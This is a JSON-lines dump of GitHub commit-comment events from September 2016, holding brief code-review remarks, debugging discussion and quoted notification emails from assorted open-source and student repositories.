{"id":"4614222856","type":"CommitCommentEvent","actor":{"login":"pranav01"},"repo":{"name":"neobuddy89/android_device_cyanogen_msm8916-common"},"payload":{"comment":{"id":19163568,"position":null,"line":null,"path":null,"commit_id":"95639bd1e69a9be3fb04d857168644cec0c4f274","created_at":"2016-09-25T13:15:35Z","updated_at":"2016-09-25T13:15:35Z","body":"This is the wrong way bro!  Let's pick from caf properly! "}},"created_at":"2016-09-25T13:15:35Z"}
{"id":"4614224697","type":"CommitCommentEvent","actor":{"login":"pranav01"},"repo":{"name":"neobuddy89/android_device_cyanogen_msm8916-common"},"payload":{"comment":{"id":19163571,"position":null,"line":null,"path":null,"commit_id":"5f968116da009c2d7fcdca1a083ecd6bec6cca73","created_at":"2016-09-25T13:16:47Z","updated_at":"2016-09-25T13:16:47Z","body":"Qti-telephony dependency is now broken!  I guess this is no more needed! "}},"created_at":"2016-09-25T13:16:47Z"}
{"id":"4614225770","type":"CommitCommentEvent","actor":{"login":"ncannasse"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19163572,"position":null,"line":null,"path":null,"commit_id":"0637ad6c96898d4811cf7c58349125f126376511","created_at":"2016-09-25T13:17:36Z","updated_at":"2016-09-25T13:17:36Z","body":"I now know you don't like randomness, after finding this code in HL that I didn't remember writing :)\r\n```haxe\r\npublic static function random():Float return 0.15; // I rolled a D20\r\n```\r\n"}},"created_at":"2016-09-25T13:17:36Z"}
{"id":"4614226227","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"MariaPriadko/lemon-school-hometask"},"payload":{"comment":{"id":19163573,"position":8,"line":8,"path":"2/index.html","commit_id":"52146f8b77faae67d55ac9385cd33cc8abacfed4","created_at":"2016-09-25T13:17:58Z","updated_at":"2016-09-25T13:17:58Z","body":"тег `style` должен быть внутри `head`, а у тебя он между `head` и `body`"}},"created_at":"2016-09-25T13:17:58Z"}
{"id":"4614226353","type":"CommitCommentEvent","actor":{"login":"vshcherb"},"repo":{"name":"osmandapp/OsmAnd-core"},"payload":{"comment":{"id":19163574,"position":null,"line":null,"path":null,"commit_id":"2c0c6e34a16cf0292030baff7ba2c59a064e8743","created_at":"2016-09-25T13:18:02Z","updated_at":"2016-09-25T13:18:02Z","body":"I just posted this instruction and it doesn't come from me, I will ask to update it, but I'm not sure if I get it, in case you get it working please create pull-request."}},"created_at":"2016-09-25T13:18:02Z"}
{"id":"4614226656","type":"CommitCommentEvent","actor":{"login":"secretdataz"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":19163575,"position":null,"line":null,"path":null,"commit_id":"90539f48b320e0a197c497d6eecac30b5d00aef6","created_at":"2016-09-25T13:18:15Z","updated_at":"2016-09-25T13:18:15Z","body":"Is it check if pointer NULL or not?\r\nYes, it also outputs the line of code which call this macro, for example,\r\n```\r\nnullpo_retv(sd);\r\n```\r\nit is equivalent to\r\n```\r\nif (nullpo_chk(NLP_MARK, (void *)(sd))) {return;}\r\n```"}},"created_at":"2016-09-25T13:18:15Z"}
{"id":"4614227386","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163577,"position":100,"line":100,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:18:49Z","updated_at":"2016-09-25T13:18:49Z","body":"Perché _header_ non ha una classe?"}},"created_at":"2016-09-25T13:18:49Z"}
{"id":"4614227556","type":"CommitCommentEvent","actor":{"login":"arrigo3"},"repo":{"name":"arrigo3/rails_enpit"},"payload":{"comment":{"id":19163578,"position":null,"line":null,"path":null,"commit_id":"049731221c03c7e10857f5f50aebfecfdbdcfaec","created_at":"2016-09-25T13:18:56Z","updated_at":"2016-09-25T13:18:56Z","body":"a"}},"created_at":"2016-09-25T13:18:56Z"}
{"id":"4614227595","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163579,"position":101,"line":101,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:18:58Z","updated_at":"2016-09-25T13:18:58Z","body":"Perché non ha una classe?"}},"created_at":"2016-09-25T13:18:58Z"}
{"id":"4614227914","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163580,"position":103,"line":103,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:19:13Z","updated_at":"2016-09-25T13:19:13Z","body":"Stessa cosa qui"}},"created_at":"2016-09-25T13:19:13Z"}
{"id":"4614228140","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163581,"position":106,"line":106,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:19:23Z","updated_at":"2016-09-25T13:19:23Z","body":"classe"}},"created_at":"2016-09-25T13:19:23Z"}
{"id":"4614228493","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163582,"position":118,"line":118,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:19:41Z","updated_at":"2016-09-25T13:19:41Z","body":"Questo div non è chiuso"}},"created_at":"2016-09-25T13:19:41Z"}
{"id":"4614229916","type":"CommitCommentEvent","actor":{"login":"GhalebKhaled"},"repo":{"name":"ORGAN-IZE/register"},"payload":{"comment":{"id":19163583,"position":null,"line":null,"path":null,"commit_id":"802390b2a274cf60c43805211076b99d68286dad","created_at":"2016-09-25T13:20:46Z","updated_at":"2016-09-25T13:20:46Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [(1) SEC - L1 - Update csrf failure view as django 1.10 [Week37]](https://trello.com/c/TNsAgajw/1213-1-sec-l1-update-csrf-failure-view-as-django-1-10-week37)"}},"created_at":"2016-09-25T13:20:46Z"}
{"id":"4614230063","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19163584,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-25T13:20:52Z","updated_at":"2016-09-25T13:20:52Z","body":"😊  \r\nThe mayby a \"please wait\" should do"}},"created_at":"2016-09-25T13:20:52Z"}
{"id":"4614230620","type":"CommitCommentEvent","actor":{"login":"lorentey"},"repo":{"name":"lorentey/BTree"},"payload":{"comment":{"id":19163586,"position":null,"line":null,"path":null,"commit_id":"d3a68aa976fe05a939fbaba4002ad0b0e571e376","created_at":"2016-09-25T13:21:17Z","updated_at":"2016-09-25T13:21:17Z","body":"I try very hard not to use any underscored API from stdlib — they are private implementation detail that stdlib engineers can (and do) change at whim. On the other hand, the forbidden fruit looks so sweet; I miss out on a lot of optimization opportunities by taking the high road. :-(\r\n\r\nPerhaps these could be added hidden behind an optional conditional compilation switch that is disabled by default. (`-DTurbo`?)"}},"created_at":"2016-09-25T13:21:17Z"}
{"id":"4614230647","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163587,"position":107,"line":107,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:21:18Z","updated_at":"2016-09-25T13:21:18Z","body":"Questo non è valido in HTML: _class=\"MenuTop-navItem.is-navItemActive\"_\r\nAvrebbe dovuto essere _class=\"MenuTop-navItem is-navItemActive\"_"}},"created_at":"2016-09-25T13:21:18Z"}
{"id":"4614231929","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19163590,"position":null,"line":null,"path":null,"commit_id":"0637ad6c96898d4811cf7c58349125f126376511","created_at":"2016-09-25T13:22:19Z","updated_at":"2016-09-25T13:22:19Z","body":"Haa, I completely forgot about that. It was from when I made Math compatible with `@:coreApi` so I had to add _some_ random function!"}},"created_at":"2016-09-25T13:22:19Z"}
{"id":"4614232307","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163595,"position":129,"line":129,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:22:32Z","updated_at":"2016-09-25T13:22:32Z","body":"Stesso problema della line 107, il punto è un carattere non valido in una classe all'interno di codice HTML, si puo' solo usare in CSS"}},"created_at":"2016-09-25T13:22:32Z"}
{"id":"4614232894","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163596,"position":141,"line":141,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:22:59Z","updated_at":"2016-09-25T13:22:59Z","body":"Classe"}},"created_at":"2016-09-25T13:22:59Z"}
{"id":"4614234637","type":"CommitCommentEvent","actor":{"login":"toxicFork"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19163603,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-25T13:24:23Z","updated_at":"2016-09-25T13:24:23Z","body":"@SpaceK33z this seems to break `karma-webpack` because `karma-webpack` sets the output path to `/karma_webpack/` which  fails the `!path.isAbsolute` but doesn't fail `compiler.outputPath.lastIndexOf(\"/\", 0) !== 0` "}},"created_at":"2016-09-25T13:24:23Z"}
{"id":"4614235392","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"oksana-synelnykova/lemon-school"},"payload":{"comment":{"id":19163604,"position":10,"line":10,"path":"2/index.html","commit_id":"a433fec9b71b338eb0f9f1098670919b779fc681","created_at":"2016-09-25T13:24:56Z","updated_at":"2016-09-25T13:24:56Z","body":"не нужно `strong` вставлять в `h1`, по умолчанию текст внутри заголовков жирный"}},"created_at":"2016-09-25T13:24:56Z"}
{"id":"4614235990","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163605,"position":143,"line":143,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:25:23Z","updated_at":"2016-09-25T13:25:23Z","body":"Ok hai capito, tutti i tag hanno bisogno di una classe.\r\nProva a capire il perché, sapresti dirmi il motivo?"}},"created_at":"2016-09-25T13:25:23Z"}
{"id":"4614237730","type":"CommitCommentEvent","actor":{"login":"mdelrio1"},"repo":{"name":"sr320/paper-pano-go"},"payload":{"comment":{"id":19163606,"position":null,"line":null,"path":null,"commit_id":"e85f3bcb219c629c012cb05a479d20cbce5b22ec","created_at":"2016-09-25T13:26:45Z","updated_at":"2016-09-25T13:26:45Z","body":"Hi Steven\nNo, you’re right I didn’t upload the file. it is 31 Mb and have to compress it, it is know on the Github as \nGeoduck-transcriptome_v3_bigtable.csv\nin the \npaper-pano-go/data-results/\nrepository.\nTake care\nMiguel\n \n\n\n\n> On Sep 24, 2016, at 14:23, Steven Roberts <notifications@github.com> wrote:\n> \n> Sorry if I missed it, but where is the table you made? The only commit I see is the notebook.\n> thanks\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/sr320/paper-pano-go/commit/e85f3bcb219c629c012cb05a479d20cbce5b22ec#commitcomment-19159862>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AOat9vs9MuKkfOxsdgghpmcQHzmPYFXoks5qtXjLgaJpZM4KFl3Y>.\n> \n\n"}},"created_at":"2016-09-25T13:26:45Z"}
{"id":"4614239141","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"VitalikStepanov/lemon-school"},"payload":{"comment":{"id":19163607,"position":1,"line":1,"path":"2/index.hrml.html","commit_id":"e2eb5bbf8928a552ced64d714c7583738bad606f","created_at":"2016-09-25T13:27:47Z","updated_at":"2016-09-25T13:27:47Z","body":"название файла оставляет желать лучшего)"}},"created_at":"2016-09-25T13:27:47Z"}
{"id":"4614239389","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"VitalikStepanov/lemon-school"},"payload":{"comment":{"id":19163608,"position":3,"line":3,"path":"2/index.hrml.html","commit_id":"e2eb5bbf8928a552ced64d714c7583738bad606f","created_at":"2016-09-25T13:27:58Z","updated_at":"2016-09-25T13:27:58Z","body":"зачем 2 тега `html`?"}},"created_at":"2016-09-25T13:27:58Z"}
{"id":"4614241531","type":"CommitCommentEvent","actor":{"login":"tushifire"},"repo":{"name":"0000066666/javamongo"},"payload":{"comment":{"id":19163610,"position":null,"line":null,"path":null,"commit_id":"bcf0652ce72dac16c63845143445a91e30bb213d","created_at":"2016-09-25T13:29:19Z","updated_at":"2016-09-25T13:29:19Z","body":"There is a possible optimisation for this"}},"created_at":"2016-09-25T13:29:19Z"}
{"id":"4614242245","type":"CommitCommentEvent","actor":{"login":"SpaceK33z"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19163611,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-25T13:29:47Z","updated_at":"2016-09-25T13:29:47Z","body":"Hmm, I changed it to `path.isAbsolute` for windows support, because windows paths don't start with `/` when absolute. Does this only break when using Windows?"}},"created_at":"2016-09-25T13:29:47Z"}
{"id":"4614243250","type":"CommitCommentEvent","actor":{"login":"mbbx6spp"},"repo":{"name":"cransom/nixpkgs"},"payload":{"comment":{"id":19163612,"position":null,"line":null,"path":null,"commit_id":"fe163f9c2fd4d7d59964a8c4d745b435b3023d27","created_at":"2016-09-25T13:30:27Z","updated_at":"2016-09-25T13:30:27Z","body":"@cransom just reviewed visually and I like the changes so far. I will try this patch out locally and check a few things."}},"created_at":"2016-09-25T13:30:27Z"}
{"id":"4614243481","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163613,"position":147,"line":147,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:30:36Z","updated_at":"2016-09-25T13:30:36Z","body":"`class=\"Cities-city-btnReadMore\"`\r\n**ReadMore** se un giorno il testo cambia in \"Click here\" devi cambiare anche la classe perché ReadMore non ha più senso. `class=\"Cities-city-btn\"` sarebbe stato sufficiente."}},"created_at":"2016-09-25T13:30:36Z"}
{"id":"4614243928","type":"CommitCommentEvent","actor":{"login":"garvinhicking"},"repo":{"name":"s9y/Serendipity"},"payload":{"comment":{"id":19163615,"position":15,"line":1134,"path":"include/functions.inc.php","commit_id":"c1e4f4c5338be96bc060a05d2a68f8e76012a3b7","created_at":"2016-09-25T13:30:54Z","updated_at":"2016-09-25T13:30:54Z","body":"@onli Yeah thanks I noticed that, one of the follow up commits fleshed that out better."}},"created_at":"2016-09-25T13:30:54Z"}
{"id":"4614247018","type":"CommitCommentEvent","actor":{"login":"thezoggy"},"repo":{"name":"Safihre/sabnzbd-yenc"},"payload":{"comment":{"id":19163618,"position":null,"line":null,"path":null,"commit_id":"24da3863c7e1f553c473d7f83511f7904246c329","created_at":"2016-09-25T13:32:55Z","updated_at":"2016-09-25T13:32:55Z","body":"yenc-freddie (0.3): https://github.com/thebananafish/yenc-freddie\r\n> is pretty old and i think is mainly optimized for posting (encoding).. not decoding\r\n\r\npsyco ( http://psyco.sourceforge.net/ ) is dead... looked like it was used for speedups in older python..\r\n"}},"created_at":"2016-09-25T13:32:55Z"}
{"id":"4614247608","type":"CommitCommentEvent","actor":{"login":"t4nk074"},"repo":{"name":"t4nk074/angband"},"payload":{"comment":{"id":19163619,"position":null,"line":null,"path":null,"commit_id":"6b82843ebd982ba96c0c9c39f1576e4ddb3180e4","created_at":"2016-09-25T13:33:18Z","updated_at":"2016-09-25T13:33:18Z","body":"Uh-oh! You're right. Actually, this parameter (string length) to Term functions is just a pain. I'll probably allow -1, like in the old Term API."}},"created_at":"2016-09-25T13:33:18Z"}
{"id":"4614247650","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"vitaly-shynakov/lemon-school"},"payload":{"comment":{"id":19163620,"position":11,"line":19,"path":"2/index.html","commit_id":"6f74acceb72ccf03dc755a2dcc87071807a55530","created_at":"2016-09-25T13:33:20Z","updated_at":"2016-09-25T13:33:20Z","body":"`hover` на ссылку пропустил"}},"created_at":"2016-09-25T13:33:20Z"}
{"id":"4614248559","type":"CommitCommentEvent","actor":{"login":"0000066666"},"repo":{"name":"0000066666/javamongo"},"payload":{"comment":{"id":19163621,"position":null,"line":null,"path":null,"commit_id":"bcf0652ce72dac16c63845143445a91e30bb213d","created_at":"2016-09-25T13:33:56Z","updated_at":"2016-09-25T13:33:56Z","body":"Okk . I will See to it.."}},"created_at":"2016-09-25T13:33:56Z"}
{"id":"4614248963","type":"CommitCommentEvent","actor":{"login":"thezoggy"},"repo":{"name":"Safihre/sabnzbd-yenc"},"payload":{"comment":{"id":19163622,"position":null,"line":null,"path":null,"commit_id":"24da3863c7e1f553c473d7f83511f7904246c329","created_at":"2016-09-25T13:34:11Z","updated_at":"2016-09-25T13:34:11Z","body":"wonder if we could use something like:\r\nhttps://software.intel.com/en-us/blogs/2016/04/04/unleash-parallel-performance-of-python-programs\r\n"}},"created_at":"2016-09-25T13:34:11Z"}
{"id":"4614249511","type":"CommitCommentEvent","actor":{"login":"neindk"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19163623,"position":null,"line":null,"path":null,"commit_id":"76db1006cca54f0364b313bef604ac59c5f9b1f0","created_at":"2016-09-25T13:34:28Z","updated_at":"2016-09-25T13:34:28Z","body":"<i>request.headers.set('X-CSRF-TOKEN', Laravel.csrfToken)</i> not works with vue-resouce 1.0.3 (with vue 1.0.27). (The previous one works fine.)"}},"created_at":"2016-09-25T13:34:28Z"}
{"id":"4614249726","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19163624,"position":46,"line":35,"path":"source/com/redhat/ceylon/ide/common/model/asjava/CeylonToJavaMapper.ceylon","commit_id":"21c17ce48016d376c34db62b1765308cd55c0797","created_at":"2016-09-25T13:34:36Z","updated_at":"2016-09-25T13:34:36Z","body":"@bjansen @davidfestal what is going on here? This line can't *possibly* be correct, can it??"}},"created_at":"2016-09-25T13:34:36Z"}
{"id":"4614251087","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163625,"position":9,"line":9,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:35:31Z","updated_at":"2016-09-25T13:35:31Z","body":"Ricorda, mai inserire lo stile nella pagina stessa. Gli stili vanno in un file separato. Ok qui lo hai messo per comodità e non perché questa pagina sarebbe andata online, ma abituati a fare sempre le cose a \"regola d'arte\". La precisione è importante. Dopotutto un altro nome per Front End Developer è Front End **Engineer** :)"}},"created_at":"2016-09-25T13:35:31Z"}
{"id":"4614252561","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19163626,"position":null,"line":null,"path":null,"commit_id":"7960517074f7a7e84ebbb95bf128c4ae519102ee","created_at":"2016-09-25T13:36:28Z","updated_at":"2016-09-25T13:36:28Z","body":"I doubt that it takes one hour. If you look at the build times, this commit increased build time by two minutes.\r\n\r\n It seems like it is hanging, but only sometimes. Maybe there is some GUI message box, that is to blame? If this is indeed the case, then that's a bug in the Cygwin installer i.e. non-interactive mode being not completely non-interactive."}},"created_at":"2016-09-25T13:36:28Z"}
{"id":"4614253322","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"kodi-pvr/pvr.dvblink"},"payload":{"comment":{"id":19163628,"position":14,"line":729,"path":"src/DVBLinkClient.cpp","commit_id":"bf99bcb7c08a9736036ba466ffdbb15450fbec63","created_at":"2016-09-25T13:37:02Z","updated_at":"2016-09-25T13:37:02Z","body":"@dvblogic @ksooo That's... not right ;)"}},"created_at":"2016-09-25T13:37:02Z"}
{"id":"4614257405","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19163635,"position":7,"line":7,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-25T13:39:51Z","updated_at":"2016-09-25T13:39:51Z","body":"Potresti provare a spiegare come mai hai pensato che questo commento fosse necessario? :)"}},"created_at":"2016-09-25T13:39:51Z"}
{"id":"4614258406","type":"CommitCommentEvent","actor":{"login":"coke11"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19163636,"position":null,"line":null,"path":null,"commit_id":"3573d1b19b102524583d1eb861be264abc461922","created_at":"2016-09-25T13:40:27Z","updated_at":"2016-09-25T13:40:27Z","body":"YES!"}},"created_at":"2016-09-25T13:40:27Z"}
{"id":"4614259408","type":"CommitCommentEvent","actor":{"login":"coke11"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19163637,"position":null,"line":null,"path":null,"commit_id":"3573d1b19b102524583d1eb861be264abc461922","created_at":"2016-09-25T13:41:08Z","updated_at":"2016-09-25T13:41:08Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [100th Commit!](https://trello.com/c/Ia4udzpI/193-100th-commit)"}},"created_at":"2016-09-25T13:41:08Z"}
{"id":"4614259780","type":"CommitCommentEvent","actor":{"login":"Safihre"},"repo":{"name":"Safihre/sabnzbd-yenc"},"payload":{"comment":{"id":19163640,"position":null,"line":null,"path":null,"commit_id":"24da3863c7e1f553c473d7f83511f7904246c329","created_at":"2016-09-25T13:41:26Z","updated_at":"2016-09-25T13:41:26Z","body":"I tried something like this, but with Sab it's the problem that we have to\ndo a lot of bookkeeping wich socket/article/file/NZB we're working on.\nThe constant communication between threads and sub processes completely\nnegated any performance benefit :(\nWe don't have big CPU heavy chunks like in any multiprocessing examples, we\nhave lots and lots of interdependent tiny bits..\n\nOn Sep 25, 2016 3:34 PM, \"thezoggy\" <notifications@github.com> wrote:\n\n> wonder if we could use something like:\n> https://software.intel.com/en-us/blogs/2016/04/04/unleash-\n> parallel-performance-of-python-programs\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Safihre/sabnzbd-yenc/commit/24da3863c7e1f553c473d7f83511f7904246c329#commitcomment-19163622>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFcHHlNXy9ba-RGdlfeXPIEX6k3yrLcsks5qtnhTgaJpZM4KFuz4>\n> .\n>\n"}},"created_at":"2016-09-25T13:41:26Z"}
{"id":"4614259928","type":"CommitCommentEvent","actor":{"login":"ekeeke"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19163641,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-25T13:41:32Z","updated_at":"2016-09-25T13:41:32Z","body":"Indeed, seems like the build (.dll) commited here was not the latest recompiled version.\r\n\r\nGet it from bitbucket repository instead:\r\nhttps://bitbucket.org/eke/genesis-plus-gx/raw/bc198ac138ceb1c363524a536a2c3a0fab0015f7/builds/genesis_plus_gx_libretro.dll\r\n"}},"created_at":"2016-09-25T13:41:32Z"}
{"id":"4614260170","type":"CommitCommentEvent","actor":{"login":"toxicFork"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19163642,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-25T13:41:42Z","updated_at":"2016-09-25T13:41:42Z","body":"I am currently testing on windows, but using git bash as terminal, I can try from native windows\r\n\r\nI think this code in `karma-webpack` may be affecting things:\r\n\r\nhttps://github.com/webpack/karma-webpack/blob/master/src/karma-webpack.js#L47 \r\n\r\nFor debugging I have changed the error message to:\r\n```js\r\n\t\tthrow new Error(\"`output.path` (\"+ compiler.outputPath +\") (isAbs: \"+path.isAbsolute(compiler.outputPath)+\") needs to be an absolute path or `/`.\");\r\n\r\n```\r\n\r\nAnd here's the log I get:\r\n```bash\r\nError: `output.path` (/_karma_webpack_/) (isAbs: false) needs to be an absolute path or `/`.\r\n```\r\n\r\nHere's my console.log of `path.isAbsolute`:\r\n```js\r\nfunction isAbsolute(path) {\r\n    assertPath(path);\r\n    const len = path.length;\r\n    if (len === 0)\r\n        return false;\r\n    var code = path.charCodeAt(0);\r\n    if (len > 1) {\r\n        if (code === 47 /*/*/ || code === 92 /*\\*/ ) {\r\n            // Possible UNC root\r\n\r\n            code = path.charCodeAt(1);\r\n            if (code === 47 /*/*/ || code === 92 /*\\*/ ) {\r\n                // Matched double path separator at beginning\r\n                var j = 2;\r\n                var last = j;\r\n                // Match 1 or more non-path separators\r\n                for (; j < len; ++j) {\r\n                    code = path.charCodeAt(j);\r\n                    if (code === 47 /*/*/ || code === 92 /*\\*/ )\r\n                        break;\r\n                }\r\n                if (j < len && j !== last) {\r\n                    // Matched!\r\n                    last = j;\r\n                    // Match 1 or more path separators\r\n                    for (; j < len; ++j) {\r\n                        code = path.charCodeAt(j);\r\n                        if (code !== 47 /*/*/ && code !== 92 /*\\*/ )\r\n                            break;\r\n                    }\r\n                    if (j < len && j !== last) {\r\n                        // Matched!\r\n                        last = j;\r\n                        // Match 1 or more non-path separators\r\n                        for (; j < len; ++j) {\r\n                            code = path.charCodeAt(j);\r\n                            if (code === 47 /*/*/ || code === 92 /*\\*/ )\r\n                                break;\r\n                        }\r\n                        if (j !== last)\r\n                            return true;\r\n                    }\r\n                }\r\n            }\r\n        } else if ((code >= 65 /*A*/ && code <= 90 /*Z*/ ) ||\r\n            (code >= 97 /*a*/ && code <= 122 /*z*/ )) {\r\n            // Possible device root\r\n\r\n            code = path.charCodeAt(1);\r\n            if (path.charCodeAt(1) === 58 /*:*/ && len > 2) {\r\n                code = path.charCodeAt(2);\r\n                if (code === 47 /*/*/ || code === 92 /*\\*/ )\r\n                    return true;\r\n            }\r\n        }\r\n    } else if (code === 47 /*/*/ || code === 92 /*\\*/ ) {\r\n        return true;\r\n    }\r\n    return false;\r\n}\r\n```\r\n\r\nShall I create an issue here or at `karma-webpack` ?"}},"created_at":"2016-09-25T13:41:42Z"}
{"id":"4614260250","type":"CommitCommentEvent","actor":{"login":"hbashton"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19163643,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-25T13:41:46Z","updated_at":"2016-09-25T13:41:46Z","body":"I meant my machine...MY machine 🌚\n\nSent from my iPhone\n\n> On Sep 25, 2016, at 3:05 AM, Simao Gomes Viana <notifications@github.com> wrote:\n> \n> Your iPhone is not aggressive. It's just enforcing.\n> \n> Am 25.09.2016 4:25 vorm. schrieb \"Hunter Ashton\" <notifications@github.com>:\n> \n> > My machine is very aggressive ;)\n> >\n> > Sent from my iPhone\n> >\n> > > On Sep 24, 2016, at 2:23 PM, Neil Agarwal <notifications@github.com>\n> > wrote:\n> > >\n> > > k\n> > >\n> > > —\n> > > You are receiving this because you are subscribed to this thread.\n> > > Reply to this email directly, view it on GitHub, or mute the thread.\n> > >\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/halogenOS/android_build/commit/fcc4b2fc143062f8051ba81133d68ac41d69deab#commitcomment-19161753>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AGowjepSr99I872xSP6wuPq2U7-Bv_3Uks5qtduLgaJpZM4KFK5G>\n> > .\n> >\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-25T13:41:46Z"}
{"id":"4614261736","type":"CommitCommentEvent","actor":{"login":"Fahrenhei7"},"repo":{"name":"Fahrenhei7/storyline"},"payload":{"comment":{"id":19163645,"position":null,"line":null,"path":null,"commit_id":"78f352fe280961355ad5f4a0101253f7c6c166e5","created_at":"2016-09-25T13:42:45Z","updated_at":"2016-09-25T13:42:45Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create Story](https://trello.com/c/XJZ9UaOh/3-create-story)"}},"created_at":"2016-09-25T13:42:45Z"}
{"id":"4614262133","type":"CommitCommentEvent","actor":{"login":"Fahrenhei7"},"repo":{"name":"Fahrenhei7/storyline"},"payload":{"comment":{"id":19163646,"position":null,"line":null,"path":null,"commit_id":"b3e00fd41a48e9f527bb6b7e91873bf256ef7aa7","created_at":"2016-09-25T13:43:01Z","updated_at":"2016-09-25T13:43:01Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create Story](https://trello.com/c/XJZ9UaOh/3-create-story)"}},"created_at":"2016-09-25T13:43:01Z"}
{"id":"4614264089","type":"CommitCommentEvent","actor":{"login":"elextr"},"repo":{"name":"asciidoc/asciidoc"},"payload":{"comment":{"id":19163647,"position":5,"line":26,"path":"lang-pl.conf","commit_id":"5ec519dc603e2f19c496b9bd5d5da84661ab7d69","created_at":"2016-09-25T13:44:18Z","updated_at":"2016-09-25T13:44:18Z","body":"Thanks fixed (hopefully)"}},"created_at":"2016-09-25T13:44:18Z"}
